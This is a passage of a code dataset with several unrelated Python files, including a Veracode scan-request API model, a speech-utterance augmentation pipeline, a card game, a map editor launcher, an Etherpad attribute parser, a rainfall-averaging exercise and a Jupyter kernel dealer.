type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'org_info': 'OrgInformation',\n 'scan_setting': 'ScanSetting',\n 'scans': 'list[ScanRequest]',\n 'schedule': 'ScanSchedule',\n 'special_instructions': 'str',\n 'visibility': 'VisibilitySetup'\n }\n\n attribute_map = {\n 'name': 'name',\n 'org_info': 'org_info',\n 'scan_setting': 'scan_setting',\n 'scans': 'scans',\n 'schedule': 'schedule',\n 'special_instructions': 'special_instructions',\n 'visibility': 'visibility'\n }\n\n def __init__(self, name=None, org_info=None, scan_setting=None, scans=None, schedule=None, special_instructions=None, visibility=None): # noqa: E501\n \"\"\"AnalysisRequest - a model defined in Swagger\"\"\" # noqa: E501\n\n self._name = None\n self._org_info = None\n self._scan_setting = None\n self._scans = None\n self._schedule = None\n self._special_instructions = None\n self._visibility = None\n self.discriminator = None\n\n if name is not None:\n self.name = name\n if org_info is not None:\n self.org_info = org_info\n if scan_setting is not None:\n self.scan_setting = scan_setting\n if scans is not None:\n self.scans = scans\n if schedule is not None:\n self.schedule = schedule\n if special_instructions is not None:\n self.special_instructions = special_instructions\n if visibility is not None:\n self.visibility = visibility\n\n @property\n def name(self):\n \"\"\"Gets the name of this AnalysisRequest. # noqa: E501\n\n Name of the Dynamic Analysis. The name must be unique to the application porfolio of the organization and the length must be between 6 and 256 characters. # noqa: E501\n\n :return: The name of this AnalysisRequest. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this AnalysisRequest.\n\n Name of the Dynamic Analysis. The name must be unique to the application porfolio of the organization and the length must be between 6 and 256 characters. # noqa: E501\n\n :param name: The name of this AnalysisRequest. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def org_info(self):\n \"\"\"Gets the org_info of this AnalysisRequest. # noqa: E501\n\n Organization information. # noqa: E501\n\n :return: The org_info of this AnalysisRequest. # noqa: E501\n :rtype: OrgInformation\n \"\"\"\n return self._org_info\n\n @org_info.setter\n def org_info(self, org_info):\n \"\"\"Sets the org_info of this AnalysisRequest.\n\n Organization information. # noqa: E501\n\n :param org_info: The org_info of this AnalysisRequest. # noqa: E501\n :type: OrgInformation\n \"\"\"\n\n self._org_info = org_info\n\n @property\n def scan_setting(self):\n \"\"\"Gets the scan_setting of this AnalysisRequest. # noqa: E501\n\n The Dynamic Analysis scan level setting that applies to all URL scans in this analysis. # noqa: E501\n\n :return: The scan_setting of this AnalysisRequest. # noqa: E501\n :rtype: ScanSetting\n \"\"\"\n return self._scan_setting\n\n @scan_setting.setter\n def scan_setting(self, scan_setting):\n \"\"\"Sets the scan_setting of this AnalysisRequest.\n\n The Dynamic Analysis scan level setting that applies to all URL scans in this analysis. # noqa: E501\n\n :param scan_setting: The scan_setting of this AnalysisRequest. # noqa: E501\n :type: ScanSetting\n \"\"\"\n\n self._scan_setting = scan_setting\n\n @property\n def scans(self):\n \"\"\"Gets the scans of this AnalysisRequest. # noqa: E501\n\n The list of URL scans included in the analysis. # noqa: E501\n\n :return: The scans of this AnalysisRequest. # noqa: E501\n :rtype: list[ScanRequest]\n \"\"\"\n return self._scans\n\n @scans.setter\n def scans(self, scans):\n \"\"\"Sets the scans of this AnalysisRequest.\n\n The list of URL scans included in the analysis. # noqa: E501\n\n :param scans: The scans of this AnalysisRequest. # noqa: E501\n :type: list[ScanRequest]\n \"\"\"\n\n self._scans = scans\n\n @property\n def schedule(self):\n \"\"\"Gets the schedule of this AnalysisRequest. # noqa: E501\n\n The schedule for the URL scan. This is optional. If not specified, no URL scans will run. You can still run verification scans. # noqa: E501\n\n :return: The schedule of this AnalysisRequest. # noqa: E501\n :rtype: ScanSchedule\n \"\"\"\n return self._schedule\n\n @schedule.setter\n def schedule(self, schedule):\n \"\"\"Sets the schedule of this AnalysisRequest.\n\n The schedule for the URL scan. This is optional. If not specified, no URL scans will run. You can still run verification scans. # noqa: E501\n\n :param schedule: The schedule of this AnalysisRequest. # noqa: E501\n :type: ScanSchedule\n \"\"\"\n\n self._schedule = schedule\n\n @property\n def special_instructions(self):\n \"\"\"Gets the special_instructions of this AnalysisRequest. # noqa: E501\n\n Special instructions related to the Dynamic Analysis. Can be null. Instructions can delay the analysis. # noqa: E501\n\n :return: The special_instructions of this AnalysisRequest. # noqa: E501\n :rtype: str\n \"\"\"\n return self._special_instructions\n\n @special_instructions.setter\n def special_instructions(self, special_instructions):\n \"\"\"Sets the special_instructions of this AnalysisRequest.\n\n Special instructions related to the Dynamic Analysis. Can be null. Instructions can delay the analysis. # noqa: E501\n\n :param special_instructions: The special_instructions of this AnalysisRequest. # noqa: E501\n :type: str\n \"\"\"\n\n self._special_instructions = special_instructions\n\n @property\n def visibility(self):\n \"\"\"Gets the visibility of this AnalysisRequest. # noqa: E501\n\n Visibility setup. # noqa: E501\n\n :return: The visibility of this AnalysisRequest. # noqa: E501\n :rtype: VisibilitySetup\n \"\"\"\n return self._visibility\n\n @visibility.setter\n def visibility(self, visibility):\n \"\"\"Sets the visibility of this AnalysisRequest.\n\n Visibility setup. # noqa: E501\n\n :param visibility: The visibility of this AnalysisRequest. # noqa: E501\n :type: VisibilitySetup\n \"\"\"\n\n self._visibility = visibility\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(AnalysisRequest, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AnalysisRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"jourzero/veracode-api-clients","sub_path":"restapi/swagger/web_app_scanning_config_service_api_1.0/python-client-generated/swagger_client/models/analysis_request.py","file_name":"analysis_request.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12456942771","text":"import json\nimport click\nimport gsp.io as io\nfrom gsp.augmenters import *\nfrom tqdm import tqdm\nfrom langchain.prompts import PromptTemplate\nfrom langchain.llms import OpenAI\nfrom langchain.chat_models import ChatOpenAI,ChatAnthropic\nfrom langchain.chains import LLMChain\nimport itertools\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef prepare(ctx):\n \"\"\"\n This pipeline converts a json dataset to a format suitable for finetuning an LLM \n \"\"\"\n data = io.load_jsonl(ctx['input'])\n data_for_finetuning = []\n for obj in data:\n if \"augmented_utterance\" in obj:\n # use augmented utterance if available\n if not obj[\"augmented_utterance\"] == \"\":\n item = {'input': obj['augmented_utterance'],'output': obj['semantics']}\n elif \"styled_utterance\" in obj:\n # see the stylize() function for the key-values in the stylized jsons \n item = {'input': obj['styled_utterance'],'output': obj['semantics']}\n else:\n # if the data has not been stylized then use old keyvalues\n item = {'input': obj['utteranceText'], 'output': obj['desiredSemantics']}\n\n item['text'] = f\"### Input: {item['input']}\\n\\n ### Output: {item['output']}\"\n data_for_finetuning.append(item)\n\n # removing duplicates\n memo = set()\n pruned_data = []\n K = \"input\"\n for sub in data_for_finetuning:\n \n # testing for already present value\n if sub[K] not in memo:\n pruned_data.append(sub)\n \n # adding in memo if new value\n memo.add(sub[K])\n\n #df = pd.DataFrame(pruned_data)\n #df.to_csv(f\"data/output/data_{ctx['type']}.csv\", index=False)\n \n stream = io.record_objs(pruned_data, f\"finetuning_{ctx['type']}\", ctx)\n for i in stream:\n pass\n print(\"Ready for finetuning\")\n return True\n\n\ndef stylize(ctx):\n if ctx['verbose']:\n print(\"Config: \",json.dumps(ctx, indent=2))\n\n # Load up the data \n stream = io.load_original_data(ctx)\n stream = io.record_objs(stream, \"original\", ctx)\n\n # Stylize the data and record in a new file \n stylized_stream = stylize_utterance(stream, ctx)\n stylized_stream = io.record_objs(stylized_stream, \"stylized\", ctx)\n\n i = 0;\n for f in stylized_stream:\n i += 1\n\n click.secho(f\"Stylizing completed. Total of {i} utterances available\")\n return True\n\n\ndef augment(ctx):\n if ctx['verbose']:\n print(\"Config: \", json.dumps(ctx, indent=2))\n\n # Load the data\n stylized_stream = io.load_styled_data(ctx)\n\n # Split this into three streams\n accent_stream, audio_stream, text_stream, translate_stream = itertools.tee(stylized_stream, 4)\n\n # accent augmentation\n if ctx['accent']:\n accent_stream = accent_augment(accent_stream, ctx)\n accent_stream = io.record_objs(accent_stream, \"accent\", ctx)\n else:\n for f in accent_stream:\n pass\n\n # audio augmentation\n if ctx['wav']:\n audio_stream = audio_augment(audio_stream, ctx)\n audio_stream = io.record_objs(audio_stream, \"audio\", ctx)\n else:\n for f in audio_stream:\n pass\n \n # Text augmentation\n if ctx['text']:\n text_stream = text_augment(text_stream, ctx)\n text_stream = io.record_objs(text_stream, \"text\", ctx)\n else:\n for f in text_stream:\n pass\n\n # Translate augmentation\n if ctx[\"language\"]:\n translate_stream = translate_augment(translate_stream, ctx)\n translate_stream = io.record_objs(translate_stream, \"translated\", ctx)\n else:\n for f in translate_stream:\n pass\n\n final_stream = itertools.chain(accent_stream,audio_stream,text_stream,translate_stream)\n final_stream = io.record_objs(final_stream, \"FINAL\", ctx)\n\n counter = 0\n for f in final_stream:\n counter += 1\n\n click.secho(f\"Augmentation completed. Total of {counter} utterances available\")\n\n return True\n\n\ndef accent_augment(stream, ctx):\n click.secho(\">> Augmenting with accents\")\n counter = 0\n accents =[\"indian\", \"american\", \"irish\", \"australian\", \"none\"] \n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for accent in tqdm(accents, desc=\"Accents\", position=1, leave=False):\n if not accent == \"none\":\n aug = AccentSpeechAugmenter()\n augmented = aug.run(utterance, accent=accent)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\ndef translate_augment(stream, ctx):\n click.secho(\">> Augmenting with translations\")\n languages = [\"de\",\"none\",\"ja\",\"hu\",\"fr\",\"zh\"]\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for language in tqdm(languages, desc=\"Languages\", position=1, leave=False):\n if not language == \"none\":\n aug = TranslationAugmenter(ctx)\n augmented = aug.run(utterance, language=language)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\n\n\ndef audio_augment(stream, ctx):\n click.secho(\">> Augmenting with audio\")\n wavs = [\"crop\", \"mask\", \"noise\", \"pitch\", \"speed\", \"normalize\", \"polarity_inversion\", \"none\"]\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for augmenter in tqdm(wavs, desc=\"Audio\", position=1, leave=False):\n if not augmenter == \"none\":\n aug = AudioSpeechAugmenter()\n augmented = aug.run(utterance, augmenter=augmenter)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\ndef text_augment(stream, ctx):\n click.secho(\">> Augmenting with text\")\n texts = [\"back_translation\", \"synonym\", \"span_crop\", \"contextual_embedding\", \"none\"]\n text_augmentations = {\"back_translation\": BackTranslationTextAugmenter,\n \"synonym\": SynonymTextAugmenter,\n \"span_crop\": SpanCropTextAugmenter,\n \"contextual_embedding\": ContextualWordEmbeddingTextAugmenter,\n \"none\": \"none\"}\n counter = 0 \n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for augmenter in tqdm(texts, desc=\"Text\", position=1, leave=False):\n if not augmenter == \"none\":\n aug = text_augmentations[augmenter](ctx)\n augmented = aug.run(utterance,1)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\n\ndef stylize_one(ctx):\n llm = ChatOpenAI(model_name=ctx['model'])\n styles = {\"none\": NoStyleAugmenter,\n \"directness\": DirectnessStyleAugmenter,\n \"formality\": FormalityStyleAugmenter,\n \"disfluency\": DisfluencyStyleAugmenter,\n \"familiarity\": FamiliarityStyleAugmenter,\n \"word_choice\": WordChoiceStyleAugmenter,\n \"asr\": ASRStyleAugmenter,\n \"correction\": CorrectionStyleAugmenter}\n utterances = []\n for name,style in tqdm(styles.items(), desc=\"Styles\"):\n stylizer = style(llm)\n styled_utterances = stylizer.run(ctx['utterance'], ctx['num_per_style'])\n utterances.append(styled_utterances)\n return utterances\n\n \n\n\ndef stylize_utterance(stream, ctx):\n click.secho(\">> Data loaded. Stylizing ...\")\n llm = ChatOpenAI(model_name=ctx['model'])\n styles = {\"none\": NoStyleAugmenter,\n \"directness\": DirectnessStyleAugmenter,\n \"formality\": FormalityStyleAugmenter,\n \"disfluency\": DisfluencyStyleAugmenter,\n \"familiarity\": FamiliarityStyleAugmenter,\n \"word_choice\": WordChoiceStyleAugmenter,\n \"asr\": ASRStyleAugmenter,\n \"correction\": CorrectionStyleAugmenter}\n\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n # Do style extensions \n for style in tqdm(ctx['style'], desc=\"Styles\", position=0, leave=False):\n stylizer = styles[style](llm)\n styled_utterances = stylizer.run(obj['utteranceText'], ctx['num_variations'])\n for styled_utterance in tqdm(styled_utterances['variations'], desc=\"Variations\", position=1, leave=False):\n new_item = {'base_utterance': obj['utteranceText'],\n 'styled_utterance': styled_utterance,\n 'stylizer': styled_utterances['metadata']['augmenter'],\n 'semantics': obj['desiredSemantics'],\n 'robot_repertoire': obj['promptInfo']}\n yield new_item\n counter += 1\n\n# TO BE DEPRECATED\ndef run(ctx):\n if ctx['verbose']:\n print(\"Config: \",json.dumps(ctx, indent=2))\n\n # Load up the data \n click.secho(\">> Loading data\")\n stream = io.load_data(ctx)\n stream = io.record_objs(stream, \"original\", ctx)\n\n \n # Stylize the data and record in a new file \n click.secho(\">> Stylizing data\")\n stylized_stream = stylize(stream, ctx)\n stylized_stream = io.record_objs(stylized_stream, \"stylized\", ctx)\n \n # Split this into three streams\n accent_stream, audio_stream, text_stream = itertools.tee(stylized_stream, 3)\n\n # accent augmentation\n click.secho(\">> Augmenting with accents\")\n accent_stream = accent_augment(accent_stream, ctx)\n accent_stream = io.record_objs(accent_stream, \"accent\", ctx)\n\n # audio augmentation\n click.secho(\">> Augmenting with audio\")\n audio_stream = audio_augment(audio_stream, ctx)\n audio_stream = io.record_objs(audio_stream, \"audio\", ctx)\n \n # Text augmentation\n click.secho(\">> Augmenting with text\")\n text_stream = text_augment(text_stream, ctx)\n text_stream = io.record_objs(text_stream, \"text\", ctx)\n\n\n final_stream = itertools.chain(accent_stream,audio_stream,text_stream)\n final_stream = io.record_objs(final_stream, \"FINAL\", ctx)\n\n for f in final_stream:\n pass\n\n return True\n\n\n","repo_name":"vasanthsarathy/gsp","sub_path":"gsp/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27483048646","text":"# Wrestling Card Game\nfrom random import shuffle\nfrom enum import IntEnum\n\nsuits = ('HEART', 'SPADES', 'DIAMONDS', 'CLUBS')\nvalues = ('A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K')\n\n\nclass CardRank(IntEnum):\n TWO = 2\n THREE = 3\n FOUR = 4\n FIVE = 5\n SIX = 6\n SEVEN = 7\n EIGHT = 8\n NINE = 9\n TEN = 10\n JACK = 11\n QUEEN = 12\n KING = 13\n ACE = 14\n\n\nRANKS = {\n '2': CardRank.TWO,\n '3': CardRank.THREE,\n '4': CardRank.FOUR,\n '5': CardRank.FIVE,\n '6': CardRank.SIX,\n '7': CardRank.SEVEN,\n '8': CardRank.EIGHT,\n '9': CardRank.NINE,\n '10': CardRank.TEN,\n 'J': CardRank.JACK,\n 'Q': CardRank.QUEEN,\n 'K': CardRank.KING,\n 'A': CardRank.ACE\n}\n\n\nclass Card:\n\n def __init__(self, suit, value):\n self.suit = suit\n self.value = value\n self.rank = RANKS[value]\n\n def __str__(self):\n return self.value + self.suit\n\n\nclass ShuffledDeck:\n def __init__(self):\n self.deck = []\n\n for suit in suits:\n for value in values:\n self.deck.append(Card(suit, value))\n\n shuffle(self.deck)\n\n def draw(self):\n return self.deck.pop()\n\n\ndeck = ShuffledDeck()\nfor i in range(0, 52):\n card1 = deck.draw()\n print(card1)\n","repo_name":"DWIGHT121/OOP","sub_path":"cardgame.py","file_name":"cardgame.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43567408684","text":"from PyQt4 import QtCore, QtGui\nimport os\nimport sys\nimport time\n\nfrom xVMapEdit import EditorWindow, EditorGlobals, ServerChooser\nfrom xVClient import Sprite, ErrorReporting\n\n\nclass MapEditorApp(object):\n \"\"\"\n Main application class for the map editor.\n \"\"\"\n\n # constants\n appname = \"Map Editor\"\n \"\"\"The application name that is shown in the title bar.\"\"\"\n\n def __init__(self):\n # initialize some variables\n self.QtApp = None\n \"\"\"The main Qt application object.\"\"\"\n \n self.MainWindow = None\n '''Handle to the main window object.'''\n \n self.ResourcesUsed = None\n '''Name of the server whose resources are in use.'''\n \n self.Sprites = None\n '''Handle to the current sprite manager.'''\n \n self.basetime = time.time()\n '''Unix time that the program was started.'''\n\n def LoadResources(self):\n \"\"\"\n Loads all resources.\n \"\"\"\n # What resources are we using?\n chooser = ServerChooser.ServerChooser(parent=None)\n chooser.setModal(True)\n chooser.exec_()\n \n # Load the sprites.\n try:\n self.Sprites = Sprite.SpriteManager(name=self.ResourcesUsed)\n except Sprite.SpriteDirectoryNotFound:\n # bail out\n sys.exit(0)\n\n def Main(self):\n \"\"\"\n Called when the application is run.\n \"\"\"\n # okay, go ahead and engage Qt\n self.QtApp = QtGui.QApplication(sys.argv)\n \n # set up error reporting\n ErrorReporting.ConfigureLogging()\n\n # load up what we need\n self.LoadResources()\n\n # and here we go! show the main window!\n self.MainWindow = EditorWindow.MainWindow()\n self.MainWindow.SetupWindow()\n self.MainWindow.show()\n\n # let Qt handle the event loop\n retval = self.QtApp.exec_()\n return retval\n \n def GetTick(self):\n '''\n Gets the number of milliseconds since the editor started running.\n \n @return: The number of milliseconds since the editor started running\n '''\n return int((time.time() - self.basetime) * 1000)\n\n\ndef Main():\n '''\n Runs the application.\n \n This is normally called from the executable script\n (bin/xVectorMapEditor.py).\n '''\n # Run the application.\n app = MapEditorApp()\n EditorGlobals.MainApp = app\n retcode = app.Main()\n sys.exit(retcode)\n","repo_name":"buchwj/xvector","sub_path":"mapeditor/xVMapEdit/MapEditor.py","file_name":"MapEditor.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41692120822","text":"#!/usr/bin/env python\n\nclass Attributes:\n def __init__(self, conn=None, pad=None,\n pool=dict(numToAttrib={}, attribToNum={})):\n self._conn = conn\n self._pad = pad\n self._pool = pool\n\n self._attrinorder = list()\n self._attrlists = dict()\n self._authors = dict()\n\n self._attribs = dict()\n\n def get(self, attr):\n attr = str(int(attr, 36))\n if attr in self._pool['numToAttrib'].keys():\n attr, param = self._pool['numToAttrib'][attr]\n elif self._pool and self._pad:\n self._pool = self._conn.getAttributePool(self._pad)['pool']\n return self.get(attr)\n elif not attr in self._pool['numToAttrib'].keys():\n raise Exception(\"Attribute not found:\", attr)\n else:\n attr, param = self._pool['numToAttrib'][attr]\n if param != \"false\":\n return attr, param\n return attr, False\n\n def reset_list(self, idx):\n if idx in self._attrlists.keys():\n params = tuple((idx,) + self._attrlists[idx])\n self._attrinorder.remove(params)\n del self._attrlists[idx]\n return True\n return False\n\n def get_pool(self):\n return self._pool\n\n def apply(self, text):\n char_dict = {}\n for i in range(0, len(text)):\n char_dict[i] = dict(char=text[i], attr=[], param=[])\n\n for idx, length, attr, param in self._attrinorder:\n for i in range(idx, idx+length):\n if attr == \"list\":\n if \"list\" in char_dict[i][\"attr\"]:\n l = char_dict[i][\"attr\"].index(\"list\")\n char_dict[i][\"attr\"].remove(\"list\")\n del char_dict[i][\"param\"][l]\n #elif attr == \"start\":\n # continue\n elif attr.startswith(\"insertorder\"):\n continue\n elif attr.startswith(\"lmkr\"):\n continue\n\n char_dict[i]['attr'].append(attr)\n char_dict[i]['param'].append(param)\n\n out = \"\"\n state = set()\n for i in range(0, len(text)):\n before = \"\"\n after = \"\"\n c = char_dict[i][\"char\"]\n if i in self._authors.keys():\n before += \"[\" + self._authors[i] + \"]\"\n for a, p in zip(char_dict[i][\"attr\"], char_dict[i][\"param\"]):\n if not a in state:\n before += \"[\" + a + \"]{\"\n state.add(a)\n if not a in char_dict[i+1][\"attr\"]:\n after += \"}\"\n state.remove(a)\n\n out += before + char_dict[i][\"char\"] + after\n\n return out\n\n def store(self, op, idx):\n attr = op[\"attribs\"]\n idx += 1\n for attr in attr.split(\"*\")[1:]:\n attr, param = self.get(attr)\n if attr == \"list\":\n self._attrlists[idx] = (op[\"chars\"], attr, param)\n self._attrinorder.append((idx, op[\"chars\"], attr, param))\n elif attr == \"author\":\n self._authors[idx] = param\n elif param == \"true\":\n self._attrinorder.append((idx, op[\"chars\"], attr, param))\n elif not param:\n self._attrinorder.remove((idx, op[\"chars\"], attr, \"true\"))\n # else:\n # print \"XX\", idx, op[\"chars\"], attr, param\n\n def extract(self, attr):\n for attr in attr.split(\"*\")[1:]:\n yield self.get(attr)\n\n","repo_name":"guyzmo/PyEtherpadLite","sub_path":"src/py_etherpad/Attributes.py","file_name":"Attributes.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"23538077481","text":"\"\"\"Write a program that uses nested loops to collect data and calculate the average rainfall over a period of years. The program should first ask for the number of years. The outer loop will iterate once for each year. The inner loop will iterate 12 times, once for each month. Each iteration of the inner loop will ask the user for the inches of rainfall for that month. After all iterations, the program should display the number of months, the total inches of rainfall, and the average rainfall per month for the entire period.\n\n\"\"\"\ntotalrain = 0.0\nmonthcount = 0.0\nyears = int(input(\"how many years would you like to collect data for? (Enter a numerical value): \"))\nfor r in range(years): # outer loop, for calculating years\n print(\"Year \", r + 1)\n for months in (\"Janurary\", \"Febuary\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"): # inner loop aks for rain of every month\n print(\"How many inches of rainfall for\", months, \":\")\n rainfall = float(input())\n totalrain += rainfall # adds all rainfall together for each month\n monthcount += 1 # counts every month for division\n\nprint(\"Total amount of recorded Rainfall: \", format(totalrain, \".2f\"))\naverageRainfall = totalrain / monthcount\nprint(\"Average rainfall: \", format(averageRainfall, '.2f'))\n","repo_name":"devingrischow/school_year_2021","sub_path":"Python_2021/prg/PycharmProjects/pythonius/4.3 Average_Rainfall.py","file_name":"4.3 Average_Rainfall.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73860692712","text":"import asyncio\nimport time\n\nimport jupyter_client.session\nimport tornado.ioloop\nimport zmq\n\nfrom log import logger\nimport misc\n\n\nconfig = misc.Config()\n\n\nclass KernelConnection(object):\n \"\"\"\n Kernel from the dealer point of view.\n \n Handles connections over ZMQ sockets to compute kernels.\n \"\"\"\n \n def __init__(self, dealer, id, connection, lifespan, timeout):\n self._on_stop = None\n self._dealer = dealer\n self.id = id\n self.executing = 0\n self.status = \"starting\"\n now = time.time()\n self.hard_deadline = now + lifespan\n self.timeout = timeout\n if timeout > 0:\n self.deadline = now + self.timeout\n self.session = jupyter_client.session.Session(\n key=connection[\"key\"].encode())\n self.channels = {}\n context = zmq.Context.instance()\n address = connection[\"ip\"]\n if \":\" in address:\n address = \"[{}]\".format(address)\n for channel, socket_type in (\n (\"shell\", zmq.DEALER), (\"iopub\", zmq.SUB), (\"hb\", zmq.REQ)):\n socket = context.socket(socket_type)\n socket.connect(\"tcp://{}:{}\".format(address, connection[channel]))\n stream = zmq.eventloop.zmqstream.ZMQStream(socket)\n stream.channel = channel\n self.channels[channel] = stream\n self.channels[\"iopub\"].socket.subscribe(b\"\")\n self.start_hb()\n logger.debug(\"KernelConnection initialized\")\n \n def on_stop(self, callback):\n self._on_stop = callback\n \n def start_hb(self):\n logger.debug(\"start_hb for %s\", self.id)\n hb = self.channels[\"hb\"]\n ioloop = tornado.ioloop.IOLoop.current()\n\n def pong(message):\n #logger.debug(\"pong for %s\", self.id)\n self._expecting_pong = False\n\n hb.on_recv(pong)\n self._expecting_pong = False\n\n def ping():\n #logger.debug(\"ping for %s\", self.id)\n now = ioloop.time()\n if self._expecting_pong:\n logger.warning(\"kernel %s died unexpectedly\", self.id)\n self.stop()\n elif now > self.hard_deadline:\n logger.info(\"hard deadline reached for %s\", self.id)\n self.stop()\n elif (self.timeout > 0\n and now > self.deadline\n and self.status == \"idle\"):\n logger.info(\"kernel %s timed out\", self.id)\n self.stop()\n else:\n hb.send(b'ping')\n self._expecting_pong = True\n\n self._hb_periodic_callback = tornado.ioloop.PeriodicCallback(\n ping, config.get(\"beat_interval\") * 1000)\n\n def start_ping():\n logger.debug(\"start_ping for %s\", self.id)\n if self.alive:\n self._hb_periodic_callback.start()\n\n self._start_ping_handle = ioloop.call_later(\n config.get(\"first_beat\"), start_ping)\n self.alive = True\n\n def stop(self):\n logger.debug(\"stopping kernel %s\", self.id)\n if not self.alive:\n logger.warning(\"not alive already\")\n return\n self.stop_hb()\n if self._on_stop:\n self._on_stop()\n for stream in self.channels.values():\n stream.close()\n self._dealer.stop_kernel(self.id)\n \n def stop_hb(self):\n logger.debug(\"stop_hb for %s\", self.id)\n self.alive = False\n self._hb_periodic_callback.stop()\n tornado.ioloop.IOLoop.current().remove_timeout(self._start_ping_handle)\n self.channels[\"hb\"].on_recv(None)\n\n\nclass KernelDealer(object):\n r\"\"\"\n Kernel Dealer handles compute kernels on the server side.\n \"\"\"\n \n def __init__(self, provider_settings):\n self.provider_settings = provider_settings\n self._available_providers = []\n self._connected_providers = {} # provider address: last message time\n self._expected_kernels = []\n self._get_queue = []\n self._kernel_origins = {} # id: provider address\n self._kernels = {} # id: KernelConnection\n context = zmq.Context.instance()\n context.IPV6 = 1\n socket = context.socket(zmq.ROUTER)\n self.port = socket.bind_to_random_port(\"tcp://*\")\n # Can configure perhaps interface/IP/port\n self._stream = zmq.eventloop.zmqstream.ZMQStream(socket)\n self._stream.on_recv(self._recv)\n logger.debug(\"KernelDealer initialized\")\n \n def _try_to_get(self):\n r\"\"\"\n Send a get request if possible AND needed.\n \"\"\"\n while self._available_providers and self._get_queue:\n self._stream.send(self._available_providers.pop(0), zmq.SNDMORE)\n self._stream.send_json([\"get\", self._get_queue.pop(0)])\n logger.debug(\"sent get request to a provider\")\n if self._available_providers:\n logger.debug(\"%s available providers are idling\",\n len(self._available_providers))\n if self._get_queue:\n logger.debug(\"%s get requests are waiting for providers\",\n len(self._get_queue))\n \n def _recv(self, msg):\n logger.debug(\"received %s\", msg)\n assert len(msg) == 2\n addr = msg[0]\n self._connected_providers[addr] = time.time()\n msg = zmq.utils.jsonapi.loads(msg[1])\n if msg == \"get settings\":\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json([\"settings\", self.provider_settings])\n elif msg == \"ready\":\n self._available_providers.append(addr)\n self._try_to_get()\n elif msg[0] == \"kernel\":\n msg = msg[1]\n for i, (rlimits, f) in enumerate(self._expected_kernels):\n if rlimits == msg[\"rlimits\"]:\n self._kernel_origins[msg[\"id\"]] = addr\n self._expected_kernels.pop(i)\n f.set_result(msg)\n break\n \n async def get_kernel(self,\n rlimits={}, lifespan=float(\"inf\"), timeout=float(\"inf\")):\n f = asyncio.get_running_loop().create_future()\n self._expected_kernels.append((rlimits, f))\n self._get_queue.append(rlimits)\n self._try_to_get()\n d = await f\n d.pop(\"rlimits\")\n d[\"lifespan\"] = lifespan\n d[\"timeout\"] = timeout\n kernel = KernelConnection(self, **d)\n self._kernels[kernel.id] = kernel\n logger.debug(\"tracking %d kernels\", len(self._kernels))\n logger.info(\"dealing kernel %s\", kernel.id)\n return kernel\n \n def kernel(self, id):\n return self._kernels[id]\n \n def stop(self):\n r\"\"\"\n Stop all kernels and disconnect all providers.\n \"\"\"\n self._stream.stop_on_recv()\n for k in list(self._kernels.values()):\n k.stop()\n for addr in self._connected_providers:\n logger.debug(\"stopping %r\", addr)\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json(\"disconnect\")\n 